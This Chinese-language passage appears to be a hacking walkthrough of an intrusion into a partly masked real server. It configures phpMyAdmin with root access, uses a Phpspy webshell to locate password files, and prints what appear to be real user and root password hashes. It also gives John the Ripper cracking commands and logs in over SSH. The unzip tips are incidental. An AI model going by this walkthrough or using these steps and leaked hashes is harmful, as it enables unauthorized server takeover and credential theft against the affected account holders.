小知识:Unzip命令语法:unzip [选项] 压缩文件名.zip。各选项的含义分别为:
-x 文件列表:解压缩文件,但不包括指定的File文件。
-v 查看压缩文件目录,但不解压。
-t 测试文件有无损坏,但不解压。
-d 目录:把压缩文件解到指定目录下。
-z 只显示压缩文件的注解。
-n 不覆盖已经存在的文件。
-o 覆盖已存在的文件且不要求用户确认。
-j 不重建文档的目录结构,把所有文件解压到同一目录下。
得到PhpMyAdmin后,再修改文件Config.inc.php的变量,修改成如下格式:
$cfg[’Servers’][$i][’user’]= ’Root’; // MySQL user
$cfg[’Servers’][$i][’password’] = ’’; // MySQL password在游览器里输入***.***.91/e***u/lib/phpMyAdmin-2.6.0-pl3/index.php就可以通过Phpmyadmin管理整个数据库了!然后进入Phpspy的WebShell模式,输入命令如下:
locate passwd
/etc/master.passwd
/etc/passwd
/home/game-tnid/game0131/adm/passwd
/home/game-tnid/gameDemoCopyFrom_game0131/adm/passwd
/home/usr/src/etc/master.passwd
/home/usr/src/release/picobsd/floppy.tree/etc/master.passwd
/home/usr/src/usr.bin/passwd
/home/www/chat/adm/passwd
/home/www/chat.old91/adm/passwd
/home/www/cycgame/idot.20030320/coop_adm/passwd
/home/www/game/game.0727/adm/passwd
/home/www/main/DBabcd/passwd
/home/www/main/ethink4u/hotnews/admin/passwd
/mirror/etc/master.passwd
/mirror/etc/passwd
/usr/bin/passwd查看它们内容后整理密码档如下:
Root:$1$xOOaGnKU$U9QdsCI40XXcCUMBN.7Az.:0:0::0:0:Charlie &:/Root:/bin/sh
funker:Hk3kVaBMnSZ2s
chat:Ecu/FE6CVZKME
game-tnid:EfyN8aw51ADXw
game:h2J9eAOTG4INA
cyc:6z3daN06RdVeU
利用工具JOHN可以破解以上密码档。它的命令行方式:john [-功能选项] [密码文件名]。现在开始进行解密步骤:
先消灭FOOL USER,就是“笨蛋用户”:john -single shadow.txt;
再消灭稍微聪明一点的用户:john -wordfile:password.lst -rules shadow.txt;
最后进行大屠杀:john -i:all shadow.txt(当然,第三步可能要你的电脑跑上10000年)。
破解结果如图3所示。
图3因为服务器开了22端口,利用工具Eric’s Telnet 98 V8.4-SSH 就可以远程登录上去了。
小提示:22端口的SSH是Secure SHell的缩写,它是一个用来替代Telnet、FTP以及R命令的工具包,主要是想解决口令在网上明文传输的问题。
整个过程中运气真的很不错,后来Funker,cyc这两个用户的密码我利用一台P4+256DDR的机器,跑了两天也跑出来了,www的用户名密码和FTP相同(不知道是不是巧合)。通常的方法是找一个Exploit,然后利用GCC命令编译后运行并提升权限,这里就不继续讨论了。